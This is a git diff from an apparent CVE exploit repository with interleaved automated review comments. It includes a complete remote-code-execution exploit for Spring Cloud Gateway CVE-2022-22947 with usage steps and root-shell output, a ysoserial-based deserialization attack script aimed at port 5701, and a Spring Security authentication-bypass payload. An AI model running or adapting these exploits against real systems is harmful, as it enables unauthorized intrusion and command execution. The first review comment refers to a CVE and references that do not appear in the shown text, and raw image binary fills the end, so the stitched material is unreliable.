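Review bot: `cve-id: CVE-2022-2292` in the classification block does not match `id: CVE-2022-2992` or the surrounding CVSS and reference data; this looks like a transposed digit and anything keyed on the classification id would point at the wrong vulnerability, so it should read `cve-id: CVE-2022-2992`. The reference list also repeats the gitlab-org CVE JSON, the GitLab issue and the HackerOne report twice each. As far as I can tell the hunk is otherwise a line-ending rewrite, so both problems carry over unchanged from the previous revision.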
@@ -1,32 +1,32 @@
-import socket
-import threading
-import time
-import sys
-import os
-groupName = b""
-clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-def socketRecv(clientSocket):
- global groupName
- while(1):
- groupName += clientSocket.recv(1024)
-if __name__ == '__main__':
-
- ip = sys.argv[1]
- payloadType = sys.argv[2]
- payload = sys.argv[3]
-
- os.system(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser")
- print(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser")
- clientSocket.connect((ip, 5701))
- obj1 = threading.Thread(target=socketRecv ,args=(clientSocket,))
- obj1.start()
- file = open("1.ser", 'rb')
- filebyte = file.read()
- print(filebyte)
-
- print("输入 send 发送payload")
- if(input("INPUT:")=="send"):
- print(groupName)
- clientSocket.send(groupName+b"\xFF\xFF\xFF\x9C"+filebyte)
- time.sleep(10)
- clientSocket.close()
+import socket
+import threading
+import time
+import sys
+import os
+groupName = b""
+clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+def socketRecv(clientSocket):
+ global groupName
+ while(1):
+ groupName += clientSocket.recv(1024)
+if __name__ == '__main__':
+
+ ip = sys.argv[1]
+ payloadType = sys.argv[2]
+ payload = sys.argv[3]
+
+ os.system(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser")
+ print(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser")
+ clientSocket.connect((ip, 5701))
+ obj1 = threading.Thread(target=socketRecv ,args=(clientSocket,))
+ obj1.start()
+ file = open("1.ser", 'rb')
+ filebyte = file.read()
+ print(filebyte)
+
+ print("输入 send 发送payload")
+ if(input("INPUT:")=="send"):
+ print(groupName)
+ clientSocket.send(groupName+b"\xFF\xFF\xFF\x9C"+filebyte)
+ time.sleep(10)
+ clientSocket.close()
diff --git a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md
index d744b0b8..2276b740 100644
--- a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md
+++ b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md 
@@ -1,44 +1,44 @@ -# Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE) -###### CVE: CVE-2022-22947 -###### CVSS: 10.0 (Vmware - https://tanzu.vmware.com/security/cve-2022-22947) -###### Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host. - - -#### Usage -```sh -git clone https://github.com/carlosevieira/CVE-2022-22947 -cd CVE-2022-22947 -pip3 install -r requirements.txt -python3 exploit.py http://target 'id' -``` - -```sh -john@doe:~/exploit/CVE-2022-22947/$ python3 exploit.py http://localhost:8080 'id' - - ################################################### - # # - # Exploit for CVE-2022-22947 # - # - Carlos Vieira (Crowsec) # - # # - # Usage: # - # python3 exploit.py # - # # - # Example: # - # python3 exploit.py http://localhost:8080 'id' # - # # - ################################################### - -[+] Stage deployed to /actuator/gateway/routes/rtxhovup -[+] Executing command... -[+] getting result... -[+] Stage removed! -uid=0(root) gid=0(root) groups=0(root) -``` - -#### References - -https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/ - -https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published - +# Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE) +###### CVE: CVE-2022-22947 +###### CVSS: 10.0 (Vmware - https://tanzu.vmware.com/security/cve-2022-22947) +###### Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host. 
+ + +#### Usage +```sh +git clone https://github.com/carlosevieira/CVE-2022-22947 +cd CVE-2022-22947 +pip3 install -r requirements.txt +python3 exploit.py http://target 'id' +``` + +```sh +john@doe:~/exploit/CVE-2022-22947/$ python3 exploit.py http://localhost:8080 'id' + + ################################################### + # # + # Exploit for CVE-2022-22947 # + # - Carlos Vieira (Crowsec) # + # # + # Usage: # + # python3 exploit.py # + # # + # Example: # + # python3 exploit.py http://localhost:8080 'id' # + # # + ################################################### + +[+] Stage deployed to /actuator/gateway/routes/rtxhovup +[+] Executing command... +[+] getting result... +[+] Stage removed! +uid=0(root) gid=0(root) groups=0(root) +``` + +#### References + +https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/ + +https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published + https://tanzu.vmware.com/security/cve-2022-22947 \ No newline at end of file diff --git a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py index 953f4759..d7e2b150 100644 --- a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py +++ b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py 
@@ -1,76 +1,76 @@ -import random -import string -import requests -import json -import sys -import urllib.parse -import base64 -import urllib3 -urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) - -headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'} - -id = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) - -def exploit(url, command): - - payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"} - - rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), verify=False) - if(rbase.status_code == 201): - print("[+] Stage deployed to /actuator/gateway/routes/"+id) - print("[+] Executing command...") - r = requests.post(url + '/actuator/gateway/refresh', headers=headers, verify=False) - if(r.status_code == 200): - print("[+] getting result...") - r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False) - if(r.status_code == 200): - get_response = r.json() - clean(url, id) - return get_response['filters'][0].split("'")[1] - else: - print("[-] Error: Invalid response") - clean(url, id) - exit(1) - else: - clean(url, id) - print("[-] Error executing command") - else: - print("[X] Error: Fail to deploy stage (Patched ?)") - exit(1) - -def clean(url, id): - remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False) - if(remove.status_code == 200): - print("[+] Stage removed!") - else: - print("[-] Error: Fail to remove stage") - -def banner(): - print(""" - ################################################### - # # - # Exploit for CVE-2022-22947 # - # - Carlos 
Vieira (Crowsec) # - # # - # Usage: # - # python3 exploit.py # - # # - # Example: # - # python3 exploit.py http://localhost:8080 'id' # - # # - ################################################### - """) - -def main(): - banner() - if len(sys.argv) != 3: - print("[-] Error: Invalid arguments") - print("[-] Usage: python3 exploit.py ") - exit(1) - else: - url = sys.argv[1] - command = sys.argv[2] - print(exploit(url, command)) -if __name__ == '__main__': +import random +import string +import requests +import json +import sys +import urllib.parse +import base64 +import urllib3 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'} + +id = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) + +def exploit(url, command): + + payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"} + + rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), verify=False) + if(rbase.status_code == 201): + print("[+] Stage deployed to /actuator/gateway/routes/"+id) + print("[+] Executing command...") + r = requests.post(url + '/actuator/gateway/refresh', headers=headers, verify=False) + if(r.status_code == 200): + print("[+] getting result...") + r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False) + if(r.status_code == 200): + get_response = r.json() + clean(url, id) + return get_response['filters'][0].split("'")[1] + else: + print("[-] Error: Invalid response") + clean(url, id) + exit(1) + else: + clean(url, id) + print("[-] Error executing command") + 
else: + print("[X] Error: Fail to deploy stage (Patched ?)") + exit(1) + +def clean(url, id): + remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False) + if(remove.status_code == 200): + print("[+] Stage removed!") + else: + print("[-] Error: Fail to remove stage") + +def banner(): + print(""" + ################################################### + # # + # Exploit for CVE-2022-22947 # + # - Carlos Vieira (Crowsec) # + # # + # Usage: # + # python3 exploit.py # + # # + # Example: # + # python3 exploit.py http://localhost:8080 'id' # + # # + ################################################### + """) + +def main(): + banner() + if len(sys.argv) != 3: + print("[-] Error: Invalid arguments") + print("[-] Usage: python3 exploit.py ") + exit(1) + else: + url = sys.argv[1] + command = sys.argv[2] + print(exploit(url, command)) +if __name__ == '__main__': main() \ No newline at end of file diff --git a/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml b/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml index 21923f43..281211f2 100644 --- a/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml +++ b/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml 
@@ -1,22 +1,22 @@
-id: CVE-2022-22947
-source:
- https://github.com/crowsec-edtech/CVE-2022-22947
-info:
- name: Spring Cloud Gateway 是 Spring Cloud 的一个全新项目,该项目是基于 Spring 5.0,Spring Boot 2.0 和 Project Reactor 等技术开发的网关,它旨在为微服务架构提供一种简单有效的统一的 API 路由管理方式。
- severity: critical
- description: |
- Spring Cloud Gateway存在远程代码执行漏洞,该漏洞是发生在Spring Cloud Gateway应用程序的Actuator端点,其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可利用该漏洞通过恶意创建允许在远程主机上执行任意远程请求。
- scope-of-influence:
- Spring Cloud GateWay 3.1.0
- Spring Cloud GateWay >=3.0.0, <=3.0.6
- Spring Cloud GateWay <3.0.0
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2022-22947
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
- cve-id: CVE-2022-22947
- cwe-id: CWE-94
- cnvd-id: None
- kve-id: None
+id: CVE-2022-22947
+source:
+ https://github.com/crowsec-edtech/CVE-2022-22947
+info:
+ name: Spring Cloud Gateway 是 Spring Cloud 的一个全新项目,该项目是基于 Spring 5.0,Spring Boot 2.0 和 Project Reactor 等技术开发的网关,它旨在为微服务架构提供一种简单有效的统一的 API 路由管理方式。
+ severity: critical
+ description: |
+ Spring Cloud Gateway存在远程代码执行漏洞,该漏洞是发生在Spring Cloud Gateway应用程序的Actuator端点,其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可利用该漏洞通过恶意创建允许在远程主机上执行任意远程请求。
+ scope-of-influence:
+ Spring Cloud GateWay 3.1.0
+ Spring Cloud GateWay >=3.0.0, <=3.0.6
+ Spring Cloud GateWay <3.0.0
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-22947
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.0
+ cve-id: CVE-2022-22947
+ cwe-id: CWE-94
+ cnvd-id: None
+ kve-id: None
 tags: cve2022, spring-cloud-gateway
\ No newline at end of file
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/.gitignore b/cve/java-spring-security/2022/CVE-2022-22978/.gitignore
new file mode 100644
index 00000000..589f69dd
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/.gitignore
@@ -0,0 +1,58 @@
+HELP.md
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### STS ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### IntelliJ IDEA ###
+.idea
+*.iws
+*.iml
+*.ipr
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
+### Java template
+# Compiled class file
+*.class
+
+# Log file
+*.log
+
+# BlueJ files
+*.ctxt
+
+# Mobile Tools for Java (J2ME)
+.mtj.tmp/
+
+# Package Files #
+*.jar
+*.war
+*.nar
+*.ear
+*.zip
+*.tar.gz
+*.rar
+
+# virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
+hs_err_pid*
+
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/.mvn/wrapper/maven-wrapper.properties b/cve/java-spring-security/2022/CVE-2022-22978/.mvn/wrapper/maven-wrapper.properties
new file mode 100644
index 00000000..b7cb93e7
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/.mvn/wrapper/maven-wrapper.properties
@@ -0,0 +1,2 @@
+distributionUrl=https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.8.4/apache-maven-3.8.4-bin.zip
+wrapperUrl=https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/Dockerfile b/cve/java-spring-security/2022/CVE-2022-22978/Dockerfile
new file mode 100644
index 00000000..f7771d2f
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/Dockerfile
@@ -0,0 +1,5 @@
+FROM openjdk:8-jdk-alpine
+MAINTAINER S0cke3t
+EXPOSE 8080
+ADD target/CVE-2022-22978-0.0.1-SNAPSHOT.jar demo.jar
+ENTRYPOINT exec java -jar /demo.jar
\ No newline at end of file
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/README.md b/cve/java-spring-security/2022/CVE-2022-22978/README.md
new file mode 100644
index 00000000..d73d4d3c
--- /dev/null
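Review bot: The wrapper bootstrap pins versions by URL only — `distributionUrl` and `wrapperUrl` name Maven 3.8.4 and maven-wrapper 3.1.0, but nothing verifies what is actually downloaded, so the build trusts whatever the repository or any intermediary serves. Maven Wrapper supports checksum pinning in this same file through `distributionSha256Sum` and `wrapperSha256Sum`; adding `distributionSha256Sum=<sha256 of apache-maven-3.8.4-bin.zip>` and `wrapperSha256Sum=<sha256 of maven-wrapper-3.1.0.jar>` (placeholders; take the digests from the Apache release checksums) makes a mismatched download fail closed. The `mvnw` script that reads this file is not in this chunk, so confirm the bundled wrapper version honours the checksum keys before relying on them.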
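Review bot: `MAINTAINER S0cke3t` uses an instruction Docker has deprecated in favour of labels, and `ADD` is used where `COPY` is the intended instruction: ADD additionally fetches remote URLs and auto-extracts archives, which a single local jar copy never needs, so COPY states the intent and narrows what the build step can do. The shell-form `ENTRYPOINT exec java -jar /demo.jar` works but starts a shell only to `exec` away from it; the exec form avoids the shell entirely. Suggested lines: `LABEL maintainer="S0cke3t"`, `COPY target/CVE-2022-22978-0.0.1-SNAPSHOT.jar demo.jar`, `ENTRYPOINT ["java", "-jar", "/demo.jar"]`. The image also has no `USER` instruction, so the JVM runs as root; since this container intentionally hosts a vulnerable demo application, switching to an unprivileged user before the ENTRYPOINT keeps a successful bypass confined to that account.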
+++ b/cve/java-spring-security/2022/CVE-2022-22978/README.md
@@ -0,0 +1,12 @@
+### CVE-2022-22978 Spring-Security bypass Demo
+>在Spring Security中使用RegexRequestMatcher且规则中包含带点号的正则表达式时,攻击者可以通过构造恶意数据包绕过身份认证
+### 影响范围
+>Spring Security 5.5.x < 5.5.7
+Spring Security 5.6.x < 5.6.4
+### 复现
+![img.png](img.png)
+![img_1.png](img_1.png)
+### Paylaod
+>http://localhost:8080/admin/index%0a
+### Docker
+> docker pull s0cke3t/cve-2022-22978:latest
\ No newline at end of file
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/img.png b/cve/java-spring-security/2022/CVE-2022-22978/img.png new file mode 100644 index 0000000000000000000000000000000000000000..3cd0812251ae3e69ff81e7180dd78659ba1ff3ec GIT binary patch literal 41580 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 